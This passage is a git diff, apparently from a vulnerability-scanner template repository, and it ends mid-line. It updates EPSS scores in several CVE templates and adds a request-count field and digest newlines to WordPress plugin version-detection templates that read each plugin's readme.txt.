b645f9f72c..b133b1f7dd 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-46747 cwe-id: CWE-288 epss-score: 0.84048 - epss-percentile: 0.98122 + epss-percentile: 0.98124 metadata: verified: true max-request: 7 diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 4e17f3b353..3ff32b9750 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4714 cwe-id: CWE-200 epss-score: 0.02146 - epss-percentile: 0.88055 + epss-percentile: 0.88061 cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index c9aacdbfab..04604eb3ab 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo epss-score: 0.92267 - epss-percentile: 0.98665 + epss-percentile: 0.98667 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index e7eb831b54..98973f2817 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4974 cwe-id: CWE-89 epss-score: 0.02282 - epss-percentile: 0.88449 + epss-percentile: 0.88453 cpe: cpe:2.3:a:creativeitem:academy_lms:6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 5091b22c37..618afa7a50 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-5074 cwe-id: CWE-798 epss-score: 0.02445 - epss-percentile: 0.88821 + epss-percentile: 0.88827 cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index 44ced6f17a..9c51d32a2b 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-5244 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.29269 + epss-percentile: 0.29273 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index 59458d7c08..60e296337c 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -14,7 +14,7 @@ info: - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34 classification: epss-score: 0.00229 - epss-percentile: 0.60947 + epss-percentile: 0.60975 metadata: verified: "true" max-request: 3 diff --git a/http/misconfiguration/installer/ruckus-smartzone-install.yaml b/http/misconfiguration/installer/ruckus-smartzone-install.yaml index 2269cb71aa..ee773f9484 100644 --- a/http/misconfiguration/installer/ruckus-smartzone-install.yaml +++ b/http/misconfiguration/installer/ruckus-smartzone-install.yaml @@ -26,4 +26,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220358c3569ebfd8f00264b278890c4e7ac408643bf913b8a6a03451780e2fd2a16022022281dcb25cad163786c76aafb9109c71087234f2f013c98ca8c86bdce09cbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220358c3569ebfd8f00264b278890c4e7ac408643bf913b8a6a03451780e2fd2a16022022281dcb25cad163786c76aafb9109c71087234f2f013c98ca8c86bdce09cbe1:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/installer/ruckus-unleashed-install.yaml b/http/misconfiguration/installer/ruckus-unleashed-install.yaml index 739bb086c2..1ddf84aefd 100644 --- a/http/misconfiguration/installer/ruckus-unleashed-install.yaml +++ b/http/misconfiguration/installer/ruckus-unleashed-install.yaml @@ -26,4 +26,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f21672734663a200710ff9c426c0b5a659413d71f344a43c585aea1acc0dce2c022100d56576de027f14ed622bef43f56df84105b38cd85ef635a5fa9bea30e24e0ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f21672734663a200710ff9c426c0b5a659413d71f344a43c585aea1acc0dce2c022100d56576de027f14ed622bef43f56df84105b38cd85ef635a5fa9bea30e24e0ed6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 181c6e7915..9b71b02b39 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3efc21ea695725f961317c9d53002869458f326d1711eaf08c8943c6f601958022100a2b98df78365ee9c1304cdf9251aaf8e30438012da34e9e59978a39abd462d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f3efc21ea695725f961317c9d53002869458f326d1711eaf08c8943c6f601958022100a2b98df78365ee9c1304cdf9251aaf8e30438012da34e9e59978a39abd462d2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index d233a1c412..565c576cba 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205bde16a6bd3ff49eeed2d5d475fe54f7f4c64e4fe8a37b8fdf402ea002c76a01022041f20d5f9475f23ea18cc48e8046aa157cc2982d1fc851929ec1a60646c3d191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205bde16a6bd3ff49eeed2d5d475fe54f7f4c64e4fe8a37b8fdf402ea002c76a01022041f20d5f9475f23ea18cc48e8046aa157cc2982d1fc851929ec1a60646c3d191:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index fc3b8ac52a..315fa9eba4 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d18edc1144e023fe603286f8250fc523db42e3a4fde2a78306f8ac38394ffda022100915f74bb0e6d5ba650cc7281d2eef03dac41bf6e96eb327aebb22915b931a4ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203d18edc1144e023fe603286f8250fc523db42e3a4fde2a78306f8ac38394ffda022100915f74bb0e6d5ba650cc7281d2eef03dac41bf6e96eb327aebb22915b931a4ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 570d379d5d..2355e78016 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206066900474bbb8fa4e998b239b3b2c76ff3a8e6f2f5bb33046e4699713214d3c022100ac1430ccb88e6dbf67b494efa14c10f706ee8dcee8b7a2ad691b2346ca6332ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206066900474bbb8fa4e998b239b3b2c76ff3a8e6f2f5bb33046e4699713214d3c022100ac1430ccb88e6dbf67b494efa14c10f706ee8dcee8b7a2ad691b2346ca6332ea:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 64dd52582a..724b92926a 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220681c726c6b1d043e9e9542e8f308b2a3760c39d3dfc23be758e208359c5a7d30022100847fe531f7b3248420a1d85ab28528ab205c46b4661b4173c3754b1c838465a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220681c726c6b1d043e9e9542e8f308b2a3760c39d3dfc23be758e208359c5a7d30022100847fe531f7b3248420a1d85ab28528ab205c46b4661b4173c3754b1c838465a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 95338b13b3..549987a64b 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022062c3554f538b50918a7e244b549b7149963bab171dc975ebf04db333b282a4de022061959bdfb1c7bc412d5901e379496114ffcf3461e72c024ea9f1c47bd3dcc662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022062c3554f538b50918a7e244b549b7149963bab171dc975ebf04db333b282a4de022061959bdfb1c7bc412d5901e379496114ffcf3461e72c024ea9f1c47bd3dcc662:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 23244102fa..f8e202dc39 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b9bcac660f69109d4b82075976ae13a6496a9c827221ade578a6a69dada1d4c02203e8e35b138bf7d4febaa69c52508984af7171d8920f08d74b6018e435f3f2540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008b9bcac660f69109d4b82075976ae13a6496a9c827221ade578a6a69dada1d4c02203e8e35b138bf7d4febaa69c52508984af7171d8920f08d74b6018e435f3f2540:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index e8665b7fac..a9139040f2 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022100c75145c169fdd73772803f9eb9298f2b2809882fe64453b2a804a840143f1641021f2c7e62343070f1af71bc48416de1bbb8724a2c7891ba70093d692b48f69d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022100c75145c169fdd73772803f9eb9298f2b2809882fe64453b2a804a840143f1641021f2c7e62343070f1af71bc48416de1bbb8724a2c7891ba70093d692b48f69d1a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index afbb6a2b2d..e55bf07256 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eea326e299375de4fc3e8a067089132c4804bcbd20bd29614f26d4c009271a8802200afe66da298913bd556c968a6ab07ec7d01629d0d7bf812c6fa25ee2ddbf9faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eea326e299375de4fc3e8a067089132c4804bcbd20bd29614f26d4c009271a8802200afe66da298913bd556c968a6ab07ec7d01629d0d7bf812c6fa25ee2ddbf9faa:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 3a6e8f7942..0f4fd6e20a 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220283532808a416990d541ec89be6fbfbeca5d4625d140e1a03bec5e45c10d468d02202833959ab2d2fcaf4dd40c101c407d272e4e1a1a680cbfe8291631fe1c55a673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220283532808a416990d541ec89be6fbfbeca5d4625d140e1a03bec5e45c10d468d02202833959ab2d2fcaf4dd40c101c407d272e4e1a1a680cbfe8291631fe1c55a673:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a073f22452..82c44132b7 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b0d5fd2fcf14f8a51f378b9b3a82bb09cc46bc8e6a8e31e7f6b75ef1769750202207eabc9af91c138fc37ab046ce5f854ff0ad5c272af1d71a183e71d6e8422cdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204b0d5fd2fcf14f8a51f378b9b3a82bb09cc46bc8e6a8e31e7f6b75ef1769750202207eabc9af91c138fc37ab046ce5f854ff0ad5c272af1d71a183e71d6e8422cdaf:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 34196b442d..60cf9e99a3 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201d80126653c9ea98957c7e200f5dc444071b2807e0851a1fa9a40589ba26a7cd022017b0f868c67730a1364c34df22e6a7dae4b25c93e78e679e104d84f8448e48bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201d80126653c9ea98957c7e200f5dc444071b2807e0851a1fa9a40589ba26a7cd022017b0f868c67730a1364c34df22e6a7dae4b25c93e78e679e104d84f8448e48bc:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index 2412345646..5414a6195c 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d190fb029f8b7c7af44c531d3ce2db3d591cb2ac1122d465d1b24a706100336022100a3876fdce6912a7461299b67ee7d40ec865aa5fa2c3c85de578892d1306b4199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206d190fb029f8b7c7af44c531d3ce2db3d591cb2ac1122d465d1b24a706100336022100a3876fdce6912a7461299b67ee7d40ec865aa5fa2c3c85de578892d1306b4199:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index a7878ce1e5..7992152eeb 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220772c07f84fc63f1c9739bac79f98b8a59285a3ac1eb93b7bc7164b1516f3c691022030cdbe9bfbc7b4d08eb42f93442a64f2d82a09c35c8942675b90c05701f69d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220772c07f84fc63f1c9739bac79f98b8a59285a3ac1eb93b7bc7164b1516f3c691022030cdbe9bfbc7b4d08eb42f93442a64f2d82a09c35c8942675b90c05701f69d37:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index e535a243b8..af1d2e65d9 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d076c2ef4b2f70c59d25bced773cb76873e05ead35aa7d1e680886308dff987e02204abf4be4b552298e29697788dcdb11231a38c56887aaefe8489d400a60b87b0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d076c2ef4b2f70c59d25bced773cb76873e05ead35aa7d1e680886308dff987e02204abf4be4b552298e29697788dcdb11231a38c56887aaefe8489d400a60b87b0e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 56bb6e0e77..f14a2262e5 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035636c788d6618089ef6ab2637a7a0f281b6ca9c11ddc17853f7cf2f783840b90221009509605eb2882e7a329808a6c817ec35398da0b39c21010f34db6ac5776055c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022035636c788d6618089ef6ab2637a7a0f281b6ca9c11ddc17853f7cf2f783840b90221009509605eb2882e7a329808a6c817ec35398da0b39c21010f34db6ac5776055c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f48f337ec9..2f694dc81f 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202105ebd370e924c550e236d1d8bf7b0aabe5806a941d22bfe2e78a840e247a11022100c81922261d2d63e9a29c072da3687c8af801f7adb406013beb408f8b8ebe3c51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202105ebd370e924c550e236d1d8bf7b0aabe5806a941d22bfe2e78a840e247a11022100c81922261d2d63e9a29c072da3687c8af801f7adb406013beb408f8b8ebe3c51:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a025e34f32..7ea6addf99 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202bbaf10d61684bf4d13b7f2b7da7fcbbec6d412cd89198009354169e65c99ba102205d5f3d5e4b13e7264c92f6fdcf111f207e5aa5b11807bbd88c3245acc2211aee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202bbaf10d61684bf4d13b7f2b7da7fcbbec6d412cd89198009354169e65c99ba102205d5f3d5e4b13e7264c92f6fdcf111f207e5aa5b11807bbd88c3245acc2211aee:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 33eb0ad880..6fea37db40 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022041468c6328755035440be35c524baf8c88ee35798f4bfa5db3eefc16903fb113022061cd95b759f11062f376d8238367c339504a3b1e3ab5a055d4002ee5b5421dfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022041468c6328755035440be35c524baf8c88ee35798f4bfa5db3eefc16903fb113022061cd95b759f11062f376d8238367c339504a3b1e3ab5a055d4002ee5b5421dfa:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index f4d1477392..7364239232 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bc9075ea0d8480810cd61917b7aa7dc9c18d280a6b71ca9850cbcc7bfb4d6e702203f6c5bdfe8bcadbc84761dad65e0b8c1a05fdeb27c229381dfe1123fdf5d47cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009bc9075ea0d8480810cd61917b7aa7dc9c18d280a6b71ca9850cbcc7bfb4d6e702203f6c5bdfe8bcadbc84761dad65e0b8c1a05fdeb27c229381dfe1123fdf5d47cb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index ed785466f6..3f2ac1c633 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 